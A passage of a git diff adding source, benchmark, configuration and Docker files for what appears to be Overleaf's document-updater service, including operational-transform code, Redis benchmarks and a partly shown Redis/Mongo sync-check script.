d: s, p: c.p + otherC.i.length }) + } + } else if (otherC.d != null) { + // Delete vs delete + if (c.p >= otherC.p + otherC.d.length) { + append(dest, { d: c.d, p: c.p - otherC.d.length }) + } else if (c.p + c.d.length <= otherC.p) { + append(dest, c) + } else { + // They overlap somewhere. + newC = { d: '', p: c.p } + if (c.p < otherC.p) { + newC.d = c.d.slice(0, otherC.p - c.p) + } + if (c.p + c.d.length > otherC.p + otherC.d.length) { + newC.d += c.d.slice(otherC.p + otherC.d.length - c.p) + } + + // This is entirely optional - just for a check that the deleted + // text in the two ops matches + intersectStart = Math.max(c.p, otherC.p) + intersectEnd = Math.min(c.p + c.d.length, otherC.p + otherC.d.length) + cIntersect = c.d.slice(intersectStart - c.p, intersectEnd - c.p) + otherIntersect = otherC.d.slice( + intersectStart - otherC.p, + intersectEnd - otherC.p + ) + if (cIntersect !== otherIntersect) { + throw new Error( + 'Delete ops delete different text in the same region of the document' + ) + } + + if (newC.d !== '') { + // This could be rewritten similarly to insert v delete, above. + newC.p = transformPosition(newC.p, otherC) + append(dest, newC) + } + } + } else if (otherC.c != null) { + append(dest, c) + } else { + throw new Error('unknown op type') + } + } else if (c.c != null) { + // Comment + if (otherC.i != null) { + if (c.p < otherC.p && otherC.p < c.p + c.c.length) { + const offset = otherC.p - c.p + const newC = + c.c.slice(0, +(offset - 1) + 1 || undefined) + + otherC.i + + c.c.slice(offset) + append(dest, { c: newC, p: c.p, t: c.t }) + } else { + append(dest, { + c: c.c, + p: transformPosition(c.p, otherC, true), + t: c.t, + }) + } + } else if (otherC.d != null) { + if (c.p >= otherC.p + otherC.d.length) { + append(dest, { c: c.c, p: c.p - otherC.d.length, t: c.t }) + } else if (c.p + c.c.length <= otherC.p) { + append(dest, c) + } else { + // Delete overlaps comment + // They overlap somewhere. + newC = { c: '', p: c.p, t: c.t } + if (c.p < otherC.p) { + newC.c = c.c.slice(0, otherC.p - c.p) + } + if (c.p + c.c.length > otherC.p + otherC.d.length) { + newC.c += c.c.slice(otherC.p + otherC.d.length - c.p) + } + + // This is entirely optional - just for a check that the deleted + // text in the two ops matches + intersectStart = Math.max(c.p, otherC.p) + intersectEnd = Math.min(c.p + c.c.length, otherC.p + otherC.d.length) + cIntersect = c.c.slice(intersectStart - c.p, intersectEnd - c.p) + otherIntersect = otherC.d.slice( + intersectStart - otherC.p, + intersectEnd - otherC.p + ) + if (cIntersect !== otherIntersect) { + throw new Error( + 'Delete ops delete different text in the same region of the document' + ) + } + + newC.p = transformPosition(newC.p, otherC) + append(dest, newC) + } + } else if (otherC.c != null) { + append(dest, c) + } else { + throw new Error('unknown op type') + } + } + + return dest +} + +const invertComponent = function (c) { + if (c.i != null) { + return { d: c.i, p: c.p } + } else { + return { i: c.d, p: c.p } + } +} + +// No need to use append for invert, because the components won't be able to +// cancel with one another. +text.invert = op => + Array.from(op.slice().reverse()).map(c => invertComponent(c)) + +if (typeof WEB !== 'undefined' && WEB !== null) { + if (!exports.types) { + exports.types = {} + } + + // This is kind of awful - come up with a better way to hook this helper code up. + bootstrapTransform(text, transformComponent, checkValidOp, append) + + // [] is used to prevent closure from renaming types.text + exports.types.text = text +} else { + module.exports = text + + // The text type really shouldn't need this - it should be possible to define + // an efficient transform function by making a sort of transform map and passing each + // op component through it. + require('./helpers').bootstrapTransform( + text, + transformComponent, + checkValidOp, + append + ) +} diff --git a/services/document-updater/app/js/sharejs/types/web-prelude.js b/services/document-updater/app/js/sharejs/types/web-prelude.js new file mode 100644 index 0000000..a4c3a0f --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/web-prelude.js @@ -0,0 +1,14 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +// This is included at the top of each compiled type file for the web. + +/** + @const + @type {boolean} +*/ +const WEB = true + +const exports = window.sharejs diff --git a/services/document-updater/app/js/types.ts b/services/document-updater/app/js/types.ts new file mode 100644 index 0000000..b3085ad --- /dev/null +++ b/services/document-updater/app/js/types.ts @@ -0,0 +1,136 @@ +import { + TrackingPropsRawData, + ClearTrackingPropsRawData, +} from 'overleaf-editor-core/lib/types' + +/** + * An update coming from the editor + */ +export type Update = { + doc: string + op: Op[] + v: number + meta?: { + tc?: boolean + user_id?: string + ts?: number + } + projectHistoryId?: string +} + +export type Op = InsertOp | DeleteOp | CommentOp | RetainOp + +export type InsertOp = { + i: string + p: number + u?: boolean +} + +export type RetainOp = { + r: string + p: number +} + +export type DeleteOp = { + d: string + p: number + u?: boolean +} + +export type CommentOp = { + c: string + p: number + t: string + u?: boolean + // Used by project-history when restoring CommentSnapshots + resolved?: boolean +} + +/** + * Ranges record on a document + */ +export type Ranges = { + comments?: Comment[] + changes?: TrackedChange[] +} + +export type Comment = { + id: string + op: CommentOp + metadata?: { + user_id: string + ts: string + } +} + +export type TrackedChange = { + id: string + op: InsertOp | DeleteOp + metadata: { + user_id: string + ts: string + } +} + +/** + * Updates sent to project-history + */ +export type HistoryUpdate = { + op: HistoryOp[] + doc: string + v?: number + meta?: { + ts?: number + pathname?: string + doc_length?: number + history_doc_length?: number + doc_hash?: string + tc?: boolean + user_id?: string + } + projectHistoryId?: string +} + +export type HistoryOp = + | HistoryInsertOp + | HistoryDeleteOp + | HistoryCommentOp + | HistoryRetainOp + +export type HistoryInsertOp = InsertOp & { + commentIds?: string[] + hpos?: number + trackedDeleteRejection?: boolean +} + +export type HistoryRetainOp = RetainOp & { + hpos?: number + tracking?: TrackingPropsRawData | ClearTrackingPropsRawData +} + +export type HistoryDeleteOp = DeleteOp & { + hpos?: number + trackedChanges?: HistoryDeleteTrackedChange[] +} + +export type HistoryDeleteTrackedChange = { + type: 'insert' | 'delete' + offset: number + length: number +} + +export type HistoryCommentOp = CommentOp & { + hpos?: number + hlen?: number +} + +export type HistoryRanges = { + comments?: HistoryComment[] + changes?: HistoryTrackedChange[] +} + +export type HistoryComment = Comment & { op: HistoryCommentOp } + +export type HistoryTrackedChange = TrackedChange & { + op: HistoryInsertOp | HistoryDeleteOp +} diff --git a/services/document-updater/benchmarks/apply.js b/services/document-updater/benchmarks/apply.js new file mode 100644 index 0000000..2467678 --- /dev/null +++ b/services/document-updater/benchmarks/apply.js @@ -0,0 +1,78 @@ +const text = require('../app/js/sharejs/types/text.js') + +const TEST_RUNS = 1_000_000 +const MAX_OPS_BATCH_SIZE = 35 +const KB = 1000 + +function runTestCase(testCase, documentSizeBytes) { + const initialText = 'A'.repeat(documentSizeBytes) + + console.log(`test: ${testCase.name}`) + console.log(`opsBatchSize\topsPerSeconds ${documentSizeBytes / 1000}KB`) + for (let i = 1; i <= MAX_OPS_BATCH_SIZE; i++) { + const ops = testCase(documentSizeBytes, i) + + let timeTotal = 0 + for (let i = 0; i < TEST_RUNS; i++) { + const start = performance.now() + try { + text.apply(initialText, ops) + } catch { + console.error(`test failed: ${testCase.name}, with ops:`) + console.error(ops) + return + } + const done = performance.now() + timeTotal += done - start + } + + const opsPerSeconds = TEST_RUNS / (timeTotal / 1000) + console.log(`${i}\t${opsPerSeconds}`) + } +} + +const randomAdditionTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, () => ({ + p: Math.floor(Math.random() * docSize), + i: 'B', + })) + +const sequentialAdditionsTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ p: i + docSize, i: 'B' })) + +const sequentialAdditionsInMiddleTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ + p: Math.floor(docSize / 2) + i, + i: 'B', + })) + +const randomDeletionTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ + p: Math.floor(Math.random() * (docSize - 1 - i)), + d: 'A', + })) + +const sequentialDeletionTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ + p: docSize - 1 - i, + d: 'A', + })) + +const sequentialDeletionInMiddleTestCase = (docSize, opsSize) => + Array.from({ length: opsSize }, (_, i) => ({ + p: Math.floor(docSize / 2), + d: 'A', + })) + +for (const docSize of [10 * KB, 100 * KB]) { + for (const testCase of [ + randomAdditionTestCase, + sequentialAdditionsTestCase, + sequentialAdditionsInMiddleTestCase, + randomDeletionTestCase, + sequentialDeletionTestCase, + sequentialDeletionInMiddleTestCase, + ]) { + runTestCase(testCase, docSize) + } +} diff --git a/services/document-updater/benchmarks/multi_vs_mget_mset.rb b/services/document-updater/benchmarks/multi_vs_mget_mset.rb new file mode 100644 index 0000000..ea953cd --- /dev/null +++ b/services/document-updater/benchmarks/multi_vs_mget_mset.rb @@ -0,0 +1,188 @@ +require "benchmark" +require "redis" + +N = (ARGV.first || 1).to_i +DOC_ID = (ARGV.last || "606072b20bb4d3109fb5b122") + +@r = Redis.new + + +def get + @r.get("doclines:{#{DOC_ID}}") + @r.get("DocVersion:{#{DOC_ID}}") + @r.get("DocHash:{#{DOC_ID}}") + @r.get("ProjectId:{#{DOC_ID}}") + @r.get("Ranges:{#{DOC_ID}}") + @r.get("Pathname:{#{DOC_ID}}") + @r.get("ProjectHistoryId:{#{DOC_ID}}") + @r.get("UnflushedTime:{#{DOC_ID}}") + @r.get("lastUpdatedAt:{#{DOC_ID}}") + @r.get("lastUpdatedBy:{#{DOC_ID}}") +end + +def mget + @r.mget( + "doclines:{#{DOC_ID}}", + "DocVersion:{#{DOC_ID}}", + "DocHash:{#{DOC_ID}}", + "ProjectId:{#{DOC_ID}}", + "Ranges:{#{DOC_ID}}", + "Pathname:{#{DOC_ID}}", + "ProjectHistoryId:{#{DOC_ID}}", + "UnflushedTime:{#{DOC_ID}}", + "lastUpdatedAt:{#{DOC_ID}}", + "lastUpdatedBy:{#{DOC_ID}}", + ) +end + +def set + @r.set("doclines:{#{DOC_ID}}", "[\"@book{adams1995hitchhiker,\",\" title={The Hitchhiker's Guide to the Galaxy},\",\" author={Adams, D.},\",\" isbn={9781417642595},\",\" url={http://books.google.com/books?id=W-xMPgAACAAJ},\",\" year={1995},\",\" publisher={San Val}\",\"}\",\"\"]") + @r.set("DocVersion:{#{DOC_ID}}", "0") + @r.set("DocHash:{#{DOC_ID}}", "0075bb0629c6c13d0d68918443648bbfe7d98869") + @r.set("ProjectId:{#{DOC_ID}}", "606072b20bb4d3109fb5b11e") + @r.set("Ranges:{#{DOC_ID}}", "") + @r.set("Pathname:{#{DOC_ID}}", "/references.bib") + @r.set("ProjectHistoryId:{#{DOC_ID}}", "") + @r.set("UnflushedTime:{#{DOC_ID}}", "") + @r.set("lastUpdatedAt:{#{DOC_ID}}", "") + @r.set("lastUpdatedBy:{#{DOC_ID}}", "") +end + +def mset + @r.mset( + "doclines:{#{DOC_ID}}", "[\"@book{adams1995hitchhiker,\",\" title={The Hitchhiker's Guide to the Galaxy},\",\" author={Adams, D.},\",\" isbn={9781417642595},\",\" url={http://books.google.com/books?id=W-xMPgAACAAJ},\",\" year={1995},\",\" publisher={San Val}\",\"}\",\"\"]", + "DocVersion:{#{DOC_ID}}", "0", + "DocHash:{#{DOC_ID}}", "0075bb0629c6c13d0d68918443648bbfe7d98869", + "ProjectId:{#{DOC_ID}}", "606072b20bb4d3109fb5b11e", + "Ranges:{#{DOC_ID}}", "", + "Pathname:{#{DOC_ID}}", "/references.bib", + "ProjectHistoryId:{#{DOC_ID}}", "", + "UnflushedTime:{#{DOC_ID}}", "", + "lastUpdatedAt:{#{DOC_ID}}", "", + "lastUpdatedBy:{#{DOC_ID}}", "", + ) +end + + +def benchmark_multi_get(benchmark, i) + benchmark.report("#{i}: multi get") do + N.times do + @r.multi do + get + end + end + end +end + +def benchmark_mget(benchmark, i) + benchmark.report("#{i}: mget") do + N.times do + mget + end + end +end + +def benchmark_multi_set(benchmark, i) + benchmark.report("#{i}: multi set") do + N.times do + @r.multi do + set + end + end + end +end + +def benchmark_mset(benchmark, i) + benchmark.report("#{i}: mset") do + N.times do + mset + end + end +end + + +# init +set + +Benchmark.bmbm do |benchmark| + 3.times do |i| + benchmark_multi_get(benchmark, i) + benchmark_mget(benchmark, i) + benchmark_multi_set(benchmark, i) + benchmark_mset(benchmark, i) + end +end + + + +=begin +# Results + +I could not max out the redis-server process with this benchmark. +The ruby process hit 100% of a modern i7 CPU thread and the redis-server process + barely hit 50% of a CPU thread. + +Based on the timings below, mget is about 3 times faster and mset about 4 times + faster than multiple get/set commands in a multi. +=end + +=begin +$ redis-server --version +Redis server v=5.0.7 sha=00000000:0 malloc=jemalloc-5.2.1 bits=64 build=636cde3b5c7a3923 +$ ruby multi_vs_mget_mset.rb 100000 +Rehearsal ------------------------------------------------ +0: multi get 12.132423 4.246689 16.379112 ( 16.420069) +0: mget 4.499457 0.947556 5.447013 ( 6.274883) +0: multi set 12.685936 4.495241 17.181177 ( 17.225984) +0: mset 2.543401 0.913448 3.456849 ( 4.554799) +1: multi get 13.397207 4.581881 17.979088 ( 18.027755) +1: mget 4.551287 1.160531 5.711818 ( 6.579168) +1: multi set 13.018957 4.927175 17.946132 ( 17.987502) +1: mset 2.561096 1.048416 3.609512 ( 4.780087) +2: multi get 13.224422 5.014475 18.238897 ( 18.284152) +2: mget 4.664434 1.051083 5.715517 ( 6.592088) +2: multi set 12.972284 4.600422 17.572706 ( 17.613185) +2: mset 2.621344 0.984123 3.605467 ( 4.766855) +------------------------------------- total: 132.843288sec + + user system total real +0: multi get 13.341552 4.900892 18.242444 ( 18.289912) +0: mget 5.056534 0.960954 6.017488 ( 6.971189) +0: multi set 12.989880 4.823793 17.813673 ( 17.858393) +0: mset 2.543434 1.025352 3.568786 ( 4.723040) +1: multi get 13.059379 4.674345 17.733724 ( 17.777859) +1: mget 4.698754 0.915637 5.614391 ( 6.489614) +1: multi set 12.608293 4.729163 17.337456 ( 17.372993) +1: mset 2.645290 0.940584 3.585874 ( 4.744134) +2: multi get 13.678224 4.732373 18.410597 ( 18.457525) +2: mget 4.716749 1.072064 5.788813 ( 6.697683) +2: multi set 13.058710 4.889801 17.948511 ( 17.988742) +2: mset 2.311854 0.989166 3.301020 ( 4.346467) +=end + +=begin +# multi get/set run at about O(65'000) operations per second +$ redis-cli info | grep 'instantaneous_ops_per_sec' +instantaneous_ops_per_sec:65557 + +# mget runs at about O(15'000) operations per second +$ redis-cli info | grep 'instantaneous_ops_per_sec' +instantaneous_ops_per_sec:14580 + +# mset runs at about O(20'000) operations per second +$ redis-cli info | grep 'instantaneous_ops_per_sec' +instantaneous_ops_per_sec:20792 + +These numbers are pretty reasonable: +multi: 100'000 * 12 ops / 18s = 66'666 ops/s +mget : 100'000 * 1 ops / 7s = 14'285 ops/s +mset : 100'000 * 1 ops / 5s = 20'000 ops/s + + + +Bonus: Running three benchmarks in parallel on different keys. +multi get: O(125'000) ops/s and 80% CPU load of redis-server +multi set: O(130'000) ops/s and 90% CPU load of redis-server +mget : O( 30'000) ops/s and 70% CPU load of redis-server +mset : O( 40'000) ops/s and 90% CPU load of redis-server +=end diff --git a/services/document-updater/buildscript.txt b/services/document-updater/buildscript.txt new file mode 100644 index 0000000..ee013eb --- /dev/null +++ b/services/document-updater/buildscript.txt @@ -0,0 +1,9 @@ +document-updater +--dependencies=mongo,redis +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 diff --git a/services/document-updater/config/settings.defaults.js b/services/document-updater/config/settings.defaults.js new file mode 100755 index 0000000..0cd29d3 --- /dev/null +++ b/services/document-updater/config/settings.defaults.js @@ -0,0 +1,187 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +module.exports = { + internal: { + documentupdater: { + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + port: 3003, + }, + }, + + apis: { + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || '127.0.0.1' + }:${process.env.WEB_API_PORT || process.env.WEB_PORT || 3000}`, + user: process.env.WEB_API_USER || 'overleaf', + pass: process.env.WEB_API_PASSWORD || 'password', + }, + project_history: { + url: `http://${process.env.PROJECT_HISTORY_HOST || '127.0.0.1'}:3054`, + }, + }, + + redis: { + pubsub: { + host: + process.env.PUBSUB_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + port: process.env.PUBSUB_REDIS_PORT || process.env.REDIS_PORT || '6379', + password: + process.env.PUBSUB_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + }, + + history: { + port: process.env.HISTORY_REDIS_PORT || process.env.REDIS_PORT || '6379', + host: + process.env.HISTORY_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + password: + process.env.HISTORY_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + }, + + project_history: { + port: process.env.HISTORY_REDIS_PORT || process.env.REDIS_PORT || '6379', + host: + process.env.HISTORY_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + password: + process.env.HISTORY_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + key_schema: { + projectHistoryOps({ project_id: projectId }) { + return `ProjectHistory:Ops:{${projectId}}` + }, + projectHistoryFirstOpTimestamp({ project_id: projectId }) { + return `ProjectHistory:FirstOpTimestamp:{${projectId}}` + }, + }, + }, + + lock: { + port: process.env.LOCK_REDIS_PORT || process.env.REDIS_PORT || '6379', + host: + process.env.LOCK_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + password: + process.env.LOCK_REDIS_PASSWORD || process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:{${docId}}` + }, + }, + }, + + documentupdater: { + port: + process.env.DOC_UPDATER_REDIS_PORT || process.env.REDIS_PORT || '6379', + host: + process.env.DOC_UPDATER_REDIS_HOST || + process.env.REDIS_HOST || + '127.0.0.1', + password: + process.env.DOC_UPDATER_REDIS_PASSWORD || + process.env.REDIS_PASSWORD || + '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + key_schema: { + blockingKey({ doc_id: docId }) { + return `Blocking:{${docId}}` + }, + docLines({ doc_id: docId }) { + return `doclines:{${docId}}` + }, + docOps({ doc_id: docId }) { + return `DocOps:{${docId}}` + }, + docVersion({ doc_id: docId }) { + return `DocVersion:{${docId}}` + }, + docHash({ doc_id: docId }) { + return `DocHash:{${docId}}` + }, + projectKey({ doc_id: docId }) { + return `ProjectId:{${docId}}` + }, + docsInProject({ project_id: projectId }) { + return `DocsIn:{${projectId}}` + }, + ranges({ doc_id: docId }) { + return `Ranges:{${docId}}` + }, + unflushedTime({ doc_id: docId }) { + return `UnflushedTime:{${docId}}` + }, + pathname({ doc_id: docId }) { + return `Pathname:{${docId}}` + }, + projectHistoryId({ doc_id: docId }) { + return `ProjectHistoryId:{${docId}}` + }, + projectState({ project_id: projectId }) { + return `ProjectState:{${projectId}}` + }, + projectBlock({ project_id: projectId }) { + return `ProjectBlock:{${projectId}}` + }, + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:{${docId}}` + }, + lastUpdatedBy({ doc_id: docId }) { + return `lastUpdatedBy:{${docId}}` + }, + lastUpdatedAt({ doc_id: docId }) { + return `lastUpdatedAt:{${docId}}` + }, + resolvedCommentIds({ doc_id: docId }) { + return `ResolvedCommentIds:{${docId}}` + }, + flushAndDeleteQueue() { + return 'DocUpdaterFlushAndDeleteQueue' + }, + historyRangesSupport() { + return 'HistoryRangesSupport' + }, + }, + }, + }, + + max_doc_length: 2 * 1024 * 1024, // 2mb + maxJsonRequestSize: + parseInt(process.env.MAX_JSON_REQUEST_SIZE, 10) || 8 * 1024 * 1024, + + dispatcherCount: parseInt(process.env.DISPATCHER_COUNT || 10, 10), + + redisLockTTLSeconds: 30, + + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, + + publishOnIndividualChannels: + process.env.PUBLISH_ON_INDIVIDUAL_CHANNELS === 'true', + + continuousBackgroundFlush: process.env.CONTINUOUS_BACKGROUND_FLUSH === 'true', + + smoothingOffset: process.env.SMOOTHING_OFFSET || 1000, // milliseconds + gracefulShutdownDelayInMs: + parseInt(process.env.GRACEFUL_SHUTDOWN_DELAY_SECONDS ?? '10', 10) * 1000, +} diff --git a/services/document-updater/docker-compose.ci.yml b/services/document-updater/docker-compose.ci.yml new file mode 100644 index 0000000..6deaad4 --- /dev/null +++ b/services/document-updater/docker-compose.ci.yml @@ -0,0 +1,65 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + redis: + image: redis + healthcheck: + test: ping="$$(redis-cli ping)" && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/document-updater/docker-compose.yml b/services/document-updater/docker-compose.yml new file mode 100644 index 0000000..e33174f --- /dev/null +++ b/services/document-updater/docker-compose.yml @@ -0,0 +1,69 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/document-updater + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/document-updater + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/document-updater + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/document-updater + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + command: npm run --silent test:acceptance + + redis: + image: redis + healthcheck: + test: ping=$$(redis-cli ping) && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + diff --git a/services/document-updater/package.json b/services/document-updater/package.json new file mode 100644 index 0000000..4fb45d6 --- /dev/null +++ b/services/document-updater/package.json @@ -0,0 +1,51 @@ +{ + "name": "@overleaf/document-updater", + "description": "An API for applying incoming updates to documents in real-time", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "benchmark:apply": "node benchmarks/apply", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/ranges-tracker": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@types/chai-as-promised": "^7.1.8", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "diff-match-patch": "overleaf/diff-match-patch#89805f9c671a77a263fc53461acd62aa7498f688", + "express": "^4.21.2", + "lodash": "^4.17.21", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "request": "^2.88.2", + "requestretry": "^7.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "cluster-key-slot": "^1.0.5", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "^2.0.0", + "typescript": "^5.0.4" + } +} diff --git a/services/document-updater/scripts/check_redis_mongo_sync_state.js b/services/document-updater/scripts/check_redis_mongo_sync_state.js new file mode 100644 index 0000000..0820940 --- /dev/null +++ b/services/document-updater/scripts/check_redis_mongo_sync_state.js @@ -0,0 +1,425 @@ +const fs = require('node:fs') +const Path = require('node:path') +const _ = require('lodash') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Errors = require('../app/js/Errors') +const LockManager = require('../app/js/LockManager') +const PersistenceManager = require('../app/js/PersistenceManager') +const ProjectFlusher = require('../app/js/ProjectFlusher') +const ProjectManager = require('../app/js/ProjectManager') +const RedisManager = require('../app/js/RedisManager') +const Settings = require('@overleaf/settings') +const request = require('requestretry').defaults({ + maxAttempts: 2, + retryDelay: 10, +}) + +const AUTO_FIX_VERSION_MISMATCH = + process.env.AUTO_FIX_VERSION_MISMATCH === 'true' +const AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA = + process.env.AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA === 'true' +const SCRIPT_LOG_LEVEL = process.env.SCRIPT_LOG_LEVEL || 'warn' +const FLUSH_IN_SYNC_PROJECTS = process.env.FLUSH_IN_SYNC_PROJECTS === 'true' +const FOLDER = + process.env.FOLDER || '/tmp/overleaf-check-redis-mongo-sync-state' +const LIMIT = parseInt(process.env.LIMIT || '1000', 10) +const RETRIES = parseInt(process.env.RETRIES || '5', 10) +const WRITE_CONTENT = process.env.WRITE_CONTENT === 'true' + +process.env.LOG_LEVEL = SCRIPT_LOG_LEVEL +logger.initialize('check-redis-mongo-sync-state') + +const COMPARE_AND_SET = + 'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("set", KEYS[1], ARGV[2]) else return 0 end' + +/** + * @typedef {Object} Doc + * @property {number} version + * @property {Array<string>} lines + * @property {string} pathname + * @property {Object} ranges + * @property {boolean} [partiallyDeleted] + */ + +class TryAgainError extends Error {} + +/** + * @param {string} docId + * @param {Doc} redisDoc + * @param {Doc} mongoDoc + * @return {Promise<void>} + */ +async function updateDocVersionInRedis(docId, redisDoc, mongoDoc) { + const lockValue = await LockManager.promises.getLock(docId) + try { + const key = Settings.redis.documentupdater.key_schema.docVersion({ + doc_id: docId, + }) + const numberOfKeys = 1 + const ok = await RedisManager.rclient.eval( + COMPARE_AND_SET, + numberOfKeys, + key, + redisDoc.version, + mongoDoc.version + ) + if (!ok) { + throw new TryAgainError( + 'document has been updated, aborting overwrite. Try again.' + ) + } + } finally { + await LockManager.promises.releaseLock(docId, lockValue) + } +} + +async function fixPartiallyDeletedDocMetadata(projectId, docId, pathname) { + await new Promise((resolve, reject) => { + request( + { + method: 'PATCH', + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016/project/${projectId}/doc/${docId}`, + timeout: 60 * 1000, + json: { + name: Path.basename(pathname), + deleted: true, + deletedAt: new Date(), + }, + }, + (err, res, body) => { + if (err) return reject(err) + const { statusCode } = res + if (statusCode !== 204) { + return reject( + new OError('patch request to docstore failed', { + statusCode, + body, + }) + ) + } + resolve() + } + ) + }) +} + +async function getDocFromMongo(projectId, docId) { + try { + return await PersistenceManager.promises.getDoc(projectId, docId) + } catch (err) { + if (!(err instanceof Errors.NotFoundError)) { + throw err + } + } + const docstoreDoc = await new Promise((resolve, reject) => { + request( + { + url: `http://${process.env.DOCSTORE_HOST || 